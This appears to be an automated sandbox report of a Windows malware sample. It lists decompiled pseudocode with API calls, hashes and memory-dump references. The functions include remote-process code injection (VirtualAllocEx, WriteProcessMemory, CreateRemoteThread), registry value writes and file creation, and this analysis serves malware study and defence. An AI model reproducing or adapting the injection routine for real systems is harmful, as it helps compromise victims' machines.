                                                                                                0x02171aed
                                                                                                0x02171aef
                                                                                                0x02171af1
                                                                                                0x02171af2
                                                                                                0x02171af2
                                                                                                0x02171aeb
                                                                                                0x02171ade

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,?), ref: 02171B47
                                                                                                • Sleep.KERNEL32(0000000A,00000000,?), ref: 02171B61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 8e47c8b5930edce53df063783d115a213fe51c6e5ac19934e942b2fd61e48dbc
                                                                                                • Instruction ID: a20a41880118ee0f91d9e6d9bdda8f3ed0d08ca453e43bf3f48989bfbd9a3b86
                                                                                                • Opcode Fuzzy Hash: 8e47c8b5930edce53df063783d115a213fe51c6e5ac19934e942b2fd61e48dbc
                                                                                                • Instruction Fuzzy Hash: A251D071694241AFD729CF6CD984756BBF5ABC5314F2886AED84CCB382E7B0C484CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 72%
                                                                                                			E021735DC(void** __eax, void* __ecx, void* __edx) {
                                                                                                				void* _t15;
                                                                                                				long _t16;
                                                                                                				long _t18;
                                                                                                				void** _t22;
                                                                                                				long _t24;
                                                                                                				signed int _t29;
                                                                                                				long _t32;
                                                                                                				void* _t33;
                                                                                                				void* _t34;
                                                                                                				void* _t35;
                                                                                                				void* _t37;
                                                                                                
                                                                                                				_t37 = __edx;
                                                                                                				_t33 = __ecx;
                                                                                                				_t22 = __eax;
                                                                                                				if(0xffffffffffff2850 == 0) {
                                                                                                					L4:
                                                                                                					_t22[1] = 0xd7b3;
                                                                                                					_t22[2] = _t37;
                                                                                                					_t22[9] = E021735B4;
                                                                                                					_t22[7] = E021730E4;
                                                                                                					if(_t22[0x12] == 0) {
                                                                                                						_t22[9] = E021730E4;
                                                                                                						if(_t33 == 3) {
                                                                                                							_t15 = GetStdHandle(0xfffffff5);
                                                                                                						} else {
                                                                                                							_t15 = GetStdHandle(0xfffffff6);
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t18 = 0xc0000000;
                                                                                                						_t29 =  *0x219000c; // 0x0
                                                                                                						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x2190758);
                                                                                                						_t24 = 2;
                                                                                                						_t34 = _t33 - 3;
                                                                                                						if(_t34 != 0) {
                                                                                                							_t24 = 3;
                                                                                                							_t35 = _t34 + 1;
                                                                                                							if(_t35 != 0) {
                                                                                                								_t18 = 0x40000000;
                                                                                                								_t22[1] = 0xd7b2;
                                                                                                								if(_t35 + 1 != 0) {
                                                                                                									_t18 = 0x80000000;
                                                                                                									_t22[1] = 0xd7b1;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_t11 =  &(_t22[0x12]); // 0x2194a24
                                                                                                						_t15 = CreateFileA(_t11, _t18, _t32, 0, _t24, 0x80, 0); // executed
                                                                                                					}
                                                                                                					if(_t15 == 0xffffffff) {
                                                                                                						_t22[1] = 0xd7b0;
                                                                                                						_t16 = GetLastError();
                                                                                                						L18:
                                                                                                						return E02172D48(_t16);
                                                                                                					} else {
                                                                                                						 *_t22 = _t15;
                                                                                                						return _t15;
                                                                                                					}
                                                                                                				}
                                                                                                				if(0xffffffffffff2850 > 3) {
                                                                                                					_t16 = 0x66;
                                                                                                					goto L18;
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
                                                                                                					E02172D48(_t20);
                                                                                                				}
                                                                                                				goto L4;
                                                                                                			}















                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(C:\Users\user\Desktop\0321423605241625.exe,C0000000,?,00000000,00000002,00000080,00000000,?,02194B88,?,021736D5,02189B26,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02173677
                                                                                                • GetStdHandle.KERNEL32(000000F5,?,02194B88,?,021736D5,02189B26,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,021949C4,ScanBuffer), ref: 02173697
                                                                                                • GetLastError.KERNEL32(000000F5,?,02194B88,?,021736D5,02189B26,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,021949C4,ScanBuffer), ref: 021736AB
                                                                                                Strings
                                                                                                • C:\Users\user\Desktop\0321423605241625.exe, xrefs: 02173676
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorFileHandleLast
                                                                                                • String ID: C:\Users\user\Desktop\0321423605241625.exe
                                                                                                • API String ID: 1572049330-1913404137
                                                                                                • Opcode ID: e595da7e55952fcf1aa1f7c6c83a7af4c934f848e8899bae03f4a04fe2501fa2
                                                                                                • Instruction ID: 60c50ee7b5801fe0f90cd668184bbe35f0ca71fe7a098a083f4a738438df8d5b
                                                                                                • Opcode Fuzzy Hash: e595da7e55952fcf1aa1f7c6c83a7af4c934f848e8899bae03f4a04fe2501fa2
                                                                                                • Instruction Fuzzy Hash: F1110DA128020099EB28DF2C8988B5669759FC4758F28C3C6F5384F399D731C944DBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 84%
                                                                                                			E02182A58(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
                                                                                                				char _v5;
                                                                                                				char _v12;
                                                                                                				char _v16;
                                                                                                				char _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				char _v32;
                                                                                                				char _v36;
                                                                                                				char _v40;
                                                                                                				void* _t29;
                                                                                                				void* _t51;
                                                                                                				void* _t65;
                                                                                                				void* _t66;
                                                                                                				intOrPtr _t70;
                                                                                                				intOrPtr _t72;
                                                                                                				char _t73;
                                                                                                				intOrPtr _t77;
                                                                                                				void* _t89;
                                                                                                				void* _t91;
                                                                                                				void* _t92;
                                                                                                				intOrPtr _t93;
                                                                                                
                                                                                                				_t73 = __edx;
                                                                                                				_t66 = __ecx;
                                                                                                				_t91 = _t92;
                                                                                                				_t93 = _t92 + 0xffffffdc;
                                                                                                				_v36 = 0;
                                                                                                				_v40 = 0;
                                                                                                				_v28 = 0;
                                                                                                				_v32 = 0;
                                                                                                				if(__edx != 0) {
                                                                                                					_t93 = _t93 + 0xfffffff0;
                                                                                                					_t29 = E02173EA8(_t29, _t91);
                                                                                                				}
                                                                                                				_t89 = _t66;
                                                                                                				_v5 = _t73;
                                                                                                				_t65 = _t29;
                                                                                                				_t87 = _a8;
                                                                                                				_push(_t91);
                                                                                                				_push(0x2182ba0);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t93;
                                                                                                				if(_a8 != 0xffff) {
                                                                                                					E02182950(E02177FF8(_t89, _t87 & 0x0000ffff), 0);
                                                                                                					if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                                                						E02178200(_t89,  &_v36);
                                                                                                						_v24 = _v36;
                                                                                                						_v20 = 0xb;
                                                                                                						E0217A96C(GetLastError(),  &_v40);
                                                                                                						_v16 = _v40;
                                                                                                						_v12 = 0xb;
                                                                                                						_t70 =  *0x2190d10; // 0x217ff30
                                                                                                						E0217B278(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
                                                                                                						E0217425C();
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t51 = CreateFileA(E02174D64(_t89), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
                                                                                                					E02182950(_t51, 0);
                                                                                                					if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                                                						E02178200(_t89,  &_v28);
                                                                                                						_v24 = _v28;
                                                                                                						_v20 = 0xb;
                                                                                                						E0217A96C(GetLastError(),  &_v32);
                                                                                                						_v16 = _v32;
                                                                                                						_v12 = 0xb;
                                                                                                						_t72 =  *0x2190eec; // 0x217ff28
                                                                                                						E0217B278(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
                                                                                                						E0217425C();
                                                                                                					}
                                                                                                				}
                                                                                                				_t27 = _t65 + 8; // 0x2180840
                                                                                                				E021748F4(_t27, _t89);
                                                                                                				_pop(_t77);
                                                                                                				 *[fs:eax] = _t77;
                                                                                                				_push(E02182BA7);
                                                                                                				return E021748C4( &_v40, 4);
                                                                                                			}

                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02182BA0,?,?,02180838,00000001), ref: 02182AB4
                                                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02182BA0,?,?,02180838,00000001), ref: 02182AE2
                                                                                                  • Part of subcall function 02177FF8: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02180838,02182B22,00000000,02182BA0,?,?,02180838), ref: 02178046
                                                                                                  • Part of subcall function 02178200: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02180838,02182B3D,00000000,02182BA0,?,?,02180838,00000001), ref: 0217821F
                                                                                                • GetLastError.KERNEL32(00000000,02182BA0,?,?,02180838,00000001), ref: 02182B47
                                                                                                  • Part of subcall function 0217A96C: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0217C585,00000000,0217C5DF), ref: 0217A98B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                • String ID:
                                                                                                • API String ID: 503785936-0
                                                                                                • Opcode ID: 2aebc2889f3f7c9d03707f52f41826e88e9a1207bf4688b2ca205fad02276206
                                                                                                • Instruction ID: 2ca4fe131b5306fd7da60d5cbdc14fa1c186dd55af531f45c8e70f051a28301f
                                                                                                • Opcode Fuzzy Hash: 2aebc2889f3f7c9d03707f52f41826e88e9a1207bf4688b2ca205fad02276206
                                                                                                • Instruction Fuzzy Hash: A1318370A807489FDB11EFB9C880BAEBBF6AF98700F508465E914A7380D7755A05CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E0218900C(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, int _a4) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				void* _v16;
                                                                                                				int _t27;
                                                                                                				char* _t29;
                                                                                                				void* _t43;
                                                                                                				intOrPtr _t49;
                                                                                                				void* _t53;
                                                                                                
                                                                                                				_v12 = __ecx;
                                                                                                				_v8 = __edx;
                                                                                                				_t43 = __eax;
                                                                                                				E02174D54(_v8);
                                                                                                				E02174D54(_v12);
                                                                                                				E02174D54(_a4);
                                                                                                				_push(_t53);
                                                                                                				_push(0x21890ae);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t53 + 0xfffffff4;
                                                                                                				RegOpenKeyA(_t43, E02174D64(_v8),  &_v16); // executed
                                                                                                				_t27 = _a4;
                                                                                                				if(_t27 != 0) {
                                                                                                					_t27 =  *(_t27 - 4);
                                                                                                				}
                                                                                                				_t29 = E02174DBC( &_a4);
                                                                                                				RegSetValueExA(_v16, E02174D64(_v12), 0, 1, _t29, _t27); // executed
                                                                                                				RegCloseKey(_v16);
                                                                                                				_pop(_t49);
                                                                                                				 *[fs:eax] = _t49;
                                                                                                				_push(E021890B5);
                                                                                                				E021748C4( &_v12, 2);
                                                                                                				return E021748A0( &_a4);
                                                                                                			}

                                                                                                APIs
                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 0218904F
                                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000000,021890AE), ref: 0218907D
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,?,00000000,021890AE), ref: 02189086
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 779948276-0
                                                                                                • Opcode ID: 04d675e9d6aa026645fd3db296be92a7093f7b37bda794274e789ea049c92456
                                                                                                • Instruction ID: 40e263cbd5e3f1739cfa4926128e0f3517215686fb1792f86914371a15331c2e
                                                                                                • Opcode Fuzzy Hash: 04d675e9d6aa026645fd3db296be92a7093f7b37bda794274e789ea049c92456
                                                                                                • Instruction Fuzzy Hash: 0811EC70A80648AFEB00EBA8CC85A9EB7FDEF88700F504475F554D7250DB71AE408E51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02185B0C(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
                                                                                                				void* _t11;
                                                                                                				_Unknown_base(*)()* _t12;
                                                                                                				void* _t13;
                                                                                                				void* _t17;
                                                                                                				void* _t19;
                                                                                                				void* _t26;
                                                                                                				void* _t27;
                                                                                                				void* _t28;
                                                                                                
                                                                                                				_t26 = __ecx;
                                                                                                				_t27 = __edx;
                                                                                                				_t19 = __eax;
                                                                                                				 *0x219452c = E02185AD8(__eax, _a8, __ecx);
                                                                                                				 *0x2194528 = E02185AD8(_t19, E02185A30(__edx), _t27);
                                                                                                				_t11 =  *0x219452c; // 0x4a80000
                                                                                                				_t12 =  *0x2194528; // 0x4fa0000
                                                                                                				_t13 = CreateRemoteThread(_t19, 0, 0, _t12, _t11, 0, 0x2194534); // executed
                                                                                                				_t28 = _t13;
                                                                                                				if(_a4 != 0) {
                                                                                                					WaitForSingleObject(_t28, 0xffffffff);
                                                                                                					_t17 =  *0x219452c; // 0x4a80000
                                                                                                					ReadProcessMemory(_t19, _t17, _t26, _a8, 0x2194530);
                                                                                                				}
                                                                                                				return _t28;
                                                                                                			}

                                                                                                APIs
                                                                                                  • Part of subcall function 02185AD8: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,02185B24), ref: 02185AED
                                                                                                  • Part of subcall function 02185AD8: WriteProcessMemory.KERNEL32(?,00000000,?,?,02194518,?,00000000,?,00003000,00000040,?,?,?,?,02185B24), ref: 02185AFD
                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,04FA0000,04A80000,00000000,02194534), ref: 02185B58
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02185B68
                                                                                                • ReadProcessMemory.KERNEL32(?,04A80000,?,?,02194530,00000000,000000FF), ref: 02185B7E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3966641755-0
                                                                                                • Opcode ID: 26e1363b2482dc558d1ef5338a912b6df4a976e03c60d10bd1cb39fac9ab8cfb
                                                                                                • Instruction ID: a235d10c8e3221ded22eb6fe4f3e455a70af6cd795b43fcda08f831c430c5160
                                                                                                • Opcode Fuzzy Hash: 26e1363b2482dc558d1ef5338a912b6df4a976e03c60d10bd1cb39fac9ab8cfb
                                                                                                • Instruction Fuzzy Hash: 3B014B717802147FE300AAADACC0F6BA2DEDB89721F514526B509D7281CAB0DC428FA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 55%
                                                                                                			E021889A4(char __eax, void* __ebx, char __edx, void* __esi) {
                                                                                                				char _v8;
                                                                                                				char _v12;
                                                                                                				void* _t16;
                                                                                                				char _t17;
                                                                                                				void* _t25;
                                                                                                				intOrPtr _t29;
                                                                                                				void* _t35;
                                                                                                
                                                                                                				_v12 = __edx;
                                                                                                				_v8 = __eax;
                                                                                                				E02174D54(_v8);
                                                                                                				E02174D54(_v12);
                                                                                                				_push(_t35);
                                                                                                				_push(0x2188a21);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t35 + 0xfffffff8;
                                                                                                				_push(0);
                                                                                                				_t16 = E02174D64(_v12);
                                                                                                				_push(_t16); // executed
                                                                                                				L021769E0(); // executed
                                                                                                				_t25 = _t16;
                                                                                                				_t17 = _v8;
                                                                                                				if(_t17 != 0) {
                                                                                                					_t17 =  *((intOrPtr*)(_t17 - 4));
                                                                                                				}
                                                                                                				_push(_t17);
                                                                                                				_push(E02174DBC( &_v8));
                                                                                                				_push(_t25); // executed
                                                                                                				L021769E8(); // executed
                                                                                                				L021769D8();
                                                                                                				_t29 = _t25;
                                                                                                				 *[fs:eax] = _t29;
                                                                                                				_push(E02188A28);
                                                                                                				return E021748C4( &_v12, 2);
                                                                                                			}











                                                                                                APIs
                                                                                                • _lcreat.KERNEL32(00000000,00000000), ref: 021889DB
                                                                                                • _lwrite.KERNEL32(00000000,00000000,?,00000000,02188A21), ref: 021889FB
                                                                                                • _lclose.KERNEL32(00000000), ref: 02188A01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: _lclose_lcreat_lwrite
                                                                                                • String ID:
                                                                                                • API String ID: 381991513-0
                                                                                                • Opcode ID: 46f45cd5a7e08abf704a5f0eb89b24f02e3292b5fddda05a310e5a62048c5c60
                                                                                                • Instruction ID: b549e2e4478f1b0c8742e2920c39c474393522d4c072a440910a4c5a88bd4e32
                                                                                                • Opcode Fuzzy Hash: 46f45cd5a7e08abf704a5f0eb89b24f02e3292b5fddda05a310e5a62048c5c60
                                                                                                • Instruction Fuzzy Hash: 84014F71680648AFEB10EBA4CC8199EB7FDEB89710F6104B1E844E3290DB319E00CE60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E021733C4(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                				long _v8;
                                                                                                				void** _t47;
                                                                                                				signed int _t48;
                                                                                                				signed int _t58;
                                                                                                
                                                                                                				_t58 = _t48;
                                                                                                				_t47 = __eax;
                                                                                                				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
                                                                                                					E02172D48(0x67);
                                                                                                					_v8 = 0;
                                                                                                				} else {
                                                                                                					if(ReadFile( *__eax, __edx, __eax[2] * _t58,  &_v8, 0) != 0) {
                                                                                                						_v8 = _v8 /  *(_t47 + 8);
                                                                                                						if(_a16 == 0) {
                                                                                                							if(_t58 != _v8) {
                                                                                                								E02172D48(_a4);
                                                                                                								_v8 = 0;
                                                                                                							}
                                                                                                						} else {
                                                                                                							 *_a16 = _v8;
                                                                                                						}
                                                                                                					} else {
                                                                                                						E02172D48(GetLastError());
                                                                                                						_v8 = 0;
                                                                                                					}
                                                                                                				}
                                                                                                				return _v8;
                                                                                                			}








                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 021733EE
                                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 021733F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 1948546556-0
                                                                                                • Opcode ID: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                                                • Instruction ID: 6be172b7c7cc9108e9cac1d865753db43aac57cd87a60d610535756a0b4f440b
                                                                                                • Opcode Fuzzy Hash: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                                                • Instruction Fuzzy Hash: 97111271744118EFDB48DFA9D980A9EB7F9EF98650B1080B6E819DB200E730DE01DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E021733C2(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                				long _v8;
                                                                                                				void** _t48;
                                                                                                				signed int _t50;
                                                                                                				signed int _t64;
                                                                                                
                                                                                                				_push(_t50);
                                                                                                				_t64 = _t50;
                                                                                                				_t48 = __eax;
                                                                                                				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
                                                                                                					E02172D48(0x67);
                                                                                                					_v8 = 0;
                                                                                                				} else {
                                                                                                					if(ReadFile( *__eax, __edx, __eax[2] * _t64,  &_v8, 0) != 0) {
                                                                                                						_v8 = _v8 /  *(_t48 + 8);
                                                                                                						if(_a16 == 0) {
                                                                                                							if(_t64 != _v8) {
                                                                                                								E02172D48(_a4);
                                                                                                								_v8 = 0;
                                                                                                							}
                                                                                                						} else {
                                                                                                							 *_a16 = _v8;
                                                                                                						}
                                                                                                					} else {
                                                                                                						E02172D48(GetLastError());
                                                                                                						_v8 = 0;
                                                                                                					}
                                                                                                				}
                                                                                                				return _v8;
                                                                                                			}








                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 021733EE
                                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 021733F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 1948546556-0
                                                                                                • Opcode ID: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                                                • Instruction ID: 9c6acc47c326201c30fddd450cea4cdb367d9923f6c8ea210bef14267b871525
                                                                                                • Opcode Fuzzy Hash: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                                                • Instruction Fuzzy Hash: C3F03071744118BF9704DAAADC85AAAB7FCEB94660B1084B6F819DB100E770DD009670
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 34%
                                                                                                			E0217CAC6(void* __eax, void* __ebx, int __edx) {
                                                                                                				struct HINSTANCE__* _v12;
                                                                                                				int _v16;
                                                                                                				int _t4;
                                                                                                				void* _t12;
                                                                                                				intOrPtr _t16;
                                                                                                				void* _t18;
                                                                                                				void* _t19;
                                                                                                				intOrPtr _t20;
                                                                                                
                                                                                                				_t18 = _t19;
                                                                                                				_t20 = _t19 + 0xfffffff4;
                                                                                                				_t12 = __eax;
                                                                                                				_t4 = SetErrorMode(__edx); // executed
                                                                                                				_v16 = _t4;
                                                                                                				_push(_t18);
                                                                                                				_push(0x217cb3a);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t20;
                                                                                                				asm("fnstcw word [ebp-0x2]");
                                                                                                				_push(_t18);
                                                                                                				_push(0x217cb1c);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t20;
                                                                                                				_v12 = LoadLibraryA(E02174D64(_t12));
                                                                                                				_pop(_t16);
                                                                                                				 *[fs:eax] = _t16;
                                                                                                				_push(E0217CB23);
                                                                                                				asm("fclex");
                                                                                                				asm("fldcw word [ebp-0x2]");
                                                                                                				return 0;
                                                                                                			}












                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLibraryLoadMode
                                                                                                • String ID:
                                                                                                • API String ID: 2987862817-0
                                                                                                • Opcode ID: fea19e74a33cc40effd3ea6e0c5e09613c53f4b24be960bb8947d20957c1216f
                                                                                                • Instruction ID: 49dd5880103dbe1a35a907c0d6870214da0e0b632acefe5e1a39c71ed3301cdd
                                                                                                • Opcode Fuzzy Hash: fea19e74a33cc40effd3ea6e0c5e09613c53f4b24be960bb8947d20957c1216f
                                                                                                • Instruction Fuzzy Hash: 08F08270654744BFEB115F75CC5182BBBFDE789B5075248B1F801D2650E7394810C960
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 34%
                                                                                                			E0217CAC8(void* __eax, void* __ebx, int __edx) {
                                                                                                				struct HINSTANCE__* _v12;
                                                                                                				int _v16;
                                                                                                				int _t4;
                                                                                                				void* _t12;
                                                                                                				intOrPtr _t16;
                                                                                                				void* _t18;
                                                                                                				void* _t19;
                                                                                                				intOrPtr _t20;
                                                                                                
                                                                                                				_t18 = _t19;
                                                                                                				_t20 = _t19 + 0xfffffff4;
                                                                                                				_t12 = __eax;
                                                                                                				_t4 = SetErrorMode(__edx); // executed
                                                                                                				_v16 = _t4;
                                                                                                				_push(_t18);
                                                                                                				_push(0x217cb3a);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t20;
                                                                                                				asm("fnstcw word [ebp-0x2]");
                                                                                                				_push(_t18);
                                                                                                				_push(0x217cb1c);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t20;
                                                                                                				_v12 = LoadLibraryA(E02174D64(_t12));
                                                                                                				_pop(_t16);
                                                                                                				 *[fs:eax] = _t16;
                                                                                                				_push(E0217CB23);
                                                                                                				asm("fclex");
                                                                                                				asm("fldcw word [ebp-0x2]");
                                                                                                				return 0;
                                                                                                			}












                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
